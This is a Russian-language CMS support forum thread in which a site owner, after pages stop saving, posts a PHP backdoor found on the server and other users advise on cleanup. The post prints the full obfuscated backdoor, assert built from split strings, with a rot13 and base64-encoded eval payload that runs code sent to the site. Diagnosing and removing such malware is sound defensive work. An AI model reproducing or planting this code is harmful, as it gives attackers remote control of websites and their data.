Вход • Регистрация

Ошибка сохранения страниц

  • 08 декабря 2015 г.
  • Всем добрый день.

    Вчера были проблемы с хостингом как мне казалось, страницы сайта грузились очень долго, либо загружались с поломанной вёрсткой и ошибкой 500 на пол экрана.

    Через несколько часов всё само собой улеглось. И при работе с сайтом заметил что когда я сохраняю страницу товара например, страница не перезагружается и не выводит на страницу с каталогом. Показывает лишь белую страницу.

    Ссылка превращается из такой: /admin/shop/site23/edit2942/
    В такую: /admin/shop/site23/save2942/

    Подскажите в чём может быть проблема?
    • 08 декабря 2015 г. , редакция: 08 декабря 2015 г.
    • Вариантов много. Полагаю, если с хостом все ОК, то надо начать с проверки целостности таблиц базы данных, затем инициируйте процедуру оптимизации таблиц базы данных.
      • 08 декабря 2015 г.
      • Дождался ответа от тех поддержки хостинга, сказали что вирус и выглядит он вот так.
        Как от него избавится?
        • 08 декабря 2015 г. , редакция: 08 декабря 2015 г.
        • Очень похоже на PHP-Backdoor.
          Cпособ интересный - обычная обфускация - и описан еще в 2008. Им пользуются давно и это, наверное, самый распространённый тип бэкдора на сегодняшний день.
          Т.е. обратившись к вашему сайту можно передать на исполнение сторонний скрипт. Например, удалить все файлы, вывести на экран config.php и т.п.
          Ваша картинка отображает только часть кода. Необходим весь скрипт.
          Теперь Вам надо либо чистить все в ручную или перезалить не испорченные файлы и базу. Затем выяснить как данный скрипт к Вам попал и закрыть брешь (cms.diafan не позволит так просто внедрить данный скрипт, поэтому возможно это косяк либо админов хоста, либо Ваша невнимательность при использовании сторонних скриптов).
          • 08 декабря 2015 г.
          • Вот весь код

            //###==###
            error_reporting(0);
            $strings = "as";$strings .= "sert";
            @$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxcMTyyXPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFx7nJLbVJymp2I0XPEwK1fvFSEHHS9OD0ASHSEsD0uOHyASIPWqXFy7nJLbpUWyM19gLKEwnPtvVF4uqFVfMzyfMI9aMKEsL29hqTIhqUZbWS9GEIWJEIWoVyAQHxyDIS9TFHkSGxSAEFWqXFxcrlEwZQ0vIIETYGtvB31yoUAyrlEwZQ0vq2yhMT93pl0kZwHkVwg9sJIfp2I7WTZjCFEwK1fvFSEHHS9OD0ASHSEsD0uOHyASIPWqB31cMvuzqJ5wqTyioy9yrTymqUZbVzA1pzksnJ5cqPVcXKfxLmR9L3IloS9cozy0XPWbqUEjBv8ip3IjMKWcozEyrTS0o3VhpaHiM2I0YaObpQ9xCFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqXF4vWaH9Vv51pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXF4vWzZ9Vv4xLmNhVvMcCGRznKN9Vv4xK1ASHyMSHyfvHxIAG1ESK0SRESVvKF4vWzt9Vv5gMQHbVwD3MzMxL2VjBJSvLJWyZwWzMQtlZ2AvBJD1MQyyATL2Vv4xK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKF4xK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0hWTZjYvVkVvxcB2A1pzksp2I0o3O0XPEwZFj0ZvkzLJkmMFx7L3IloS9mMKEipUDbWTZkYQR5BGRmYUElqJHcBlEcLaLtCFNtL3IloS9yrTIwXPEwZFx7L3IloS9woT9mMFtxLmRcB31yoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvx9CGRcrlEcLaLtCFOznJkyK2qyqS9wo250MJ50pltvnUE0pQbiY3A1pTIlnJ5xMKuuqT9lYaW1Y2qyqP5jnUN/MQ0vYaIloTIhL29xMFtxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWVISEDK1IGEIWsDHqSGyDvKFxhVvMwCFVhWTZjYvVznG0kWzyjCFVhWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0hVvMbCFVhoJD1XPV0A2MzMTAvZQyuLzSvMGVlMzD4ZwAwLwyxAJD5MGEzAvVhWS9GEIWJEIWoVyASHyMSHy9BDH1SVy0hWS9GEIWJEIWoVyWSHIISH1EsIIWWVy0hWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqYvEwZP4vZFVcXGg9VTyzVPucp3AyqPtxnJW2XFxtrlOyL2uiVPEcLaL7VU0tnJLbnKAmMKDbWS9FEISIEIAHJlWjVy0cVPLzVPEsHxIEIHIGISfvpPWqVQ09VPWvMTMuMwV2BPVcVUftDTSmp2IlqPtxK1WSHIISH1EoVzZvKFx7VU19"));'));
            //###==###
            • 08 декабря 2015 г.
            • Можно скачать папку custom, затем ее удалить.

              Нажать в в Темах - Сгенерировать тему и он сам покажет исправленные файлы.
            • 08 декабря 2015 г. , редакция: 08 декабря 2015 г.
            • Интересная модификация.
              Проверьте .htaccess , index.php , index.html , а так же смотрите добавляемые левые папки со всяким бредом...
              А также
              Цитата
              Вам надо либо чистить все в ручную или перезалить не испорченные файлы и базу. Затем выяснить как данный скрипт к Вам попал и закрыть брешь (cms.diafan не позволит так просто внедрить данный скрипт, поэтому возможно это косяк либо админов хоста, либо Ваша невнимательность при использовании сторонних скриптов).

              Желательно для Вас это сделать оперативно. Пока более не могу добавить, т.к. загружен своими вопросами, если будет необходимо отвечу немного позже. Возможно другие участники форума, что-то подскажут.
              Не совсем согласен с Александр Биг Эпл (ba5), т.к. данный код позволяет корректировать и кастомизированные файлы (впрочем как и все остальное), но как вариант не плохой.
              • 08 декабря 2015 г.
              • Все же интересная тема, лично я бы не спешил. Вычистил бы все вручную, модифицировал данный скрипт с отдачей в ответ сюрприза, поставил бы отдельное логирование на такое обращение к сайту, затем постарался бы определить от куда идут обращения. В общем все зависит от фантазии.
  • 08 декабря 2015 г. , редакция: 08 декабря 2015 г.
  • Цитата
    Если какие-то системные файлы были изменены, метод их покажет

    Александр Биг Эпл (ba5), например метод не сможет показать, что изменился .htaccess, index.php, init.php и т.д., или созданы дополнительные папки и файлы, к которым возможно обратиться напрямую (минуя обработчик cms)

Новости

  • 18 июня
  • В сборке большое обновление demo-шаблона, дополнительная защита от спама, улучшение YML-импорта и еще много важного и интересного.
  • 24 апреля
  • В новой сборке совершили революцию в структурировании кастомизированной информации в шаблонах, добавили авторегистрацию пользователей, усовершенствовали защиту от спама, актуализировали накопительную скидку, а также улучшили производительность и стабильность работы системы.
  • 12 января
  • После выхода сборки 7.1 мы выпустили уже три патча, в каждом из которых улучшаем административную часть сайта. Сборка DIAFAN.CMS 7.1.3 уже доступна к установке. 

Форум